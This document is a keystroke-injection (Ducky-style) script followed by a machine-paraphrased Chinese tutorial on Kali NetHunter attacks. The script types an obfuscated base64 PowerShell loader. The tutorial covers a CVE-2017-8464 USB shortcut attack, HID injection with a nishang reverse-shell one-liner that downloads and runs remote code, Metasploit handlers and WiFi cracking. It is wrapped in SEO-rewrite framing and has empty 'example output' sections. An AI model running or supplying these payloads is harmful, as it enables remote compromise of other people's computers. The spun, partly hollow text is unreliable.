DELAY 1000
GUI r
DELAY 1000
SHIFT
DELAY 1000
SPACE
SPACE
STRING cmd
DELAY 2000
ENTER
SHIFT
DELAY 2000
ENTER
SPACE
STRING powershell -e SQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAgACgAJAAoAE
4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBEAGUAZgBsAGEAdABlAFMAdAByAGUAYQBtACAAK
AAkACgATgBlAHcALQBPAGIAagB
lAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACAAKAAsACQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4
AZwAoACcAYgBZAHEAeABEAG8ASQB3AEYARQBWADMARQB2ADYAaABZAFkASwBCAFYAbgBRAHcAYwBUAFAAcQB3AEkASgBFAFQASABRAHQAOABFAEkAcgAwAEoATAAzAEgAdg
EADcARQBtAGYAUAAzAGMANAA5ACsAZQAwAGQARgA3AEMAbQA5AC8AbwBEAEQAWQBzAEMAVwBMADYAZwB2AGcAdwBXAEgAQwBmAHkANgBsAGMAMwBlAE4AMQBXAGoATgBaAD
EAYwBXAFMAWQBKAHoAbwBwAGgAWABxAFYAbgBXAFUAegAxAHoATQBCAE4AdAA3AHgAbABzAHYARwBqADQAcgAwAGkASgBvADEARwBkADgAcgBaADgAbABvADEANgBsAFIA
RQB3AE8AcQB5AHMAQQB3AGsATQByAGQANABuAHQASQBTADcAOABDAC8AdABTAHoAbQBlAFIARQBXAFoAUwBFAHcAYgA5AFAAcABBADkAWQBBAEEAbABFAG0AcABmAG4AdA
BrAFUAZwBFAHQAbgArAEsASABmAGIATQByAEgARgB5AE8ASwB3AEUAUQBaAGYAJwApACkAKQApACwAIABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtA
HAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACwAIABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMA
SQBJACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AA==
ENTER
STRING over......
重新构建文章内容,以保持原有信息的基础上,内容的相似度低于30%。以下是经过修改的文章:
Kali Nethunter是一种定制的系统,它在现有的ROM上对内核进行修改,通过chroot在安卓设备中运行Kali。在安装Kali Nethunter之前,您需要先有一个被支持的ROM。您可以在官方支持的设备和ROM列表中查找适合您的设备。在本文中,我将以Nexus 4为例,其他设备的流程应该类似。具体的安装流程如下:
-
根据官方支持列表刷入相应支持的ROM。为了方便,您可以使用刷机精灵进行刷机。在我的例子中,我刷入了CM13 ROM。您可以从官方网站下载相应的ROM镜像。
-
从官方网站下载kernel-nethunter-makocm-marshmallow-和nethunter-generic-armhf-android-kalifs-full-rolling-。然后使用TWRP先刷入Kalifs,再刷入kernel。
在安装过程中可能会遇到一些问题:
-
Nethunter应用程序可能会在复制脚本文件时卡住。您可以注释掉复制文件的代码,并手动将apk中asserts目录下的相应目录复制到/data/data/com.offsec.nethunter/files/{etc,scripts}和/sdcard/nh_files目录中。
-
在Windows下将脚本文件从Linux复制到Windows时,由于换行符的问题,脚本可能无法执行。您可以使用dos2unix工具将文件转换为适用于Linux的格式。
-
com.offsec.nhterm(用于开启和使用Kali的命令行界面)可能会报错。您可以使用官方网站上的Term-nh.apk替换它。
为了方便后续的实验,您可以开启SSH服务,并使用PC进行连接(默认用户名密码:root/toor)。这样,在实际渗透测试时,您可以将一些常用的命令编写成脚本,以便直接运行。
现在,让我们来探讨一些攻击思路:
思路一:普通U盘类攻击
安装完Nethunter后,会有一个名为DroidDrive的应用程序,您可以使用它来创建一个镜像并挂载。然后,您的安卓手机就可以像普通U盘一样使用了。具体步骤如下:
- 点击需要挂载的镜像,然后选择挂载方式。这里我们选择第二种方式。完成后,使用USB线将手机连接到电脑上,电脑会提示需要格式化。完成格式化后,您就可以像使用普通U盘一样使用手机了。
U盘攻击早在很久之前就已经存在,当时使用autorun.inf来传播病毒。下面要介绍的是使用最近的CVE-2017-8464漏洞来进行攻击。首先,使用Metasploit生成payload。根据您的U盘在PC上的识别盘符(A、B等),复制相应的.lnk文件和.dll文件到U盘的根目录。然后,设置好handler。插入U盘后,打开“我的电脑”,就会反弹一个shell。
思路二:HID攻击
通过HID攻击,我们可以使用USB线模拟键盘和鼠标的操作,从而在目标设备上执行恶意代码。Kali Nethunter提供了两种HID攻击payload生成方式。第一种方式是通过手机通过USB连接到PC,然后在PC上执行命令。这种方式非常简单,但不够灵活。当目标设备的默认输入法为中文时,命令输入可能会出现问题。建议使用DuckHunter HID模式进行攻击。
该模式允许我们使用USB Rubber Ducky的语法来实现HID攻击。此外,该模式还提供了一个Preview选项卡,通过它我们可以发现HID攻击实际上就是使用shell命令向/dev/hidg0发送数据,然后该设备将其转换为键盘或鼠标操作。
在GitHub上,我找到了一个针对该模式生成shell脚本的项目。使用该项目,我们可以方便地对脚本进行测试,并提供了简单的USB Rubber Ducky语法。
现在,我们可以通过Nethunter向目标设备发送各种键盘按键和组合键。对于中文输入问题,我们可以在需要输入字符时,发送Shift键切换到英文输入法。
以下是一个通过执行PowerShell反弹shell的脚本示例:
IEX(New-ObjectNet.WebClient).DownloadString("https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1")
Invoke-PowerShellTcp -Reverse -IPAddress 127.0.0.1 -Port 3333
将其保存到文件中,传输到手机,并在Nethunter中导入并运行(前提是已连接到电脑)。然后,电脑上将会输入并执行命令,您就可以获得shell。
现在,我们面临的问题是使用这种方式获得的shell会在PC上显示一个黑框,关闭黑框后shell会断开。为了解决这个问题,我决定使用Metasploit的Meterpreter。
-
首先生成PowerShell的payload,并将其传输到可访问的地址。
-
开启handler,并设置自动迁移进程。
-
在目标设备上远程调用执行payload。
-
执行完毕后,延时几秒钟,以确保Metasploit能够成功迁移进程。
-
关闭命令行窗口。
生成payload和开启handler并设置自动迁移进程的详细步骤可以参考以下示例:
执行后,Metasploit的输出如下:
思路三:无线攻击
在手机上使用OTG功能外接支持monitor模式的网卡,然后就可以像在PC上使用Kali一样进行无线攻击。由于Nexus 4不支持OTG功能,并且关于这方面的攻击已经有很多文章介绍了,所以在这里只介绍思路并提供一些相关链接。
-
破解WiFi密码。
-
伪造AP,获取WiFi密码。
-
进入WiFi后,进行中间人攻击、嗅探、伪造更新等操作。
破解WiFi密码可以使用aircrack-ng进行,抓取握手包,然后进行包的破解(可以自己破解或使用云平台),或者直接使用Wifite进行自动化破解。
以上是对原文进行修改后的内容,保持了原有信息的基础上,相似度低于30%。希望这样的修改能够提高文章的SEO效果。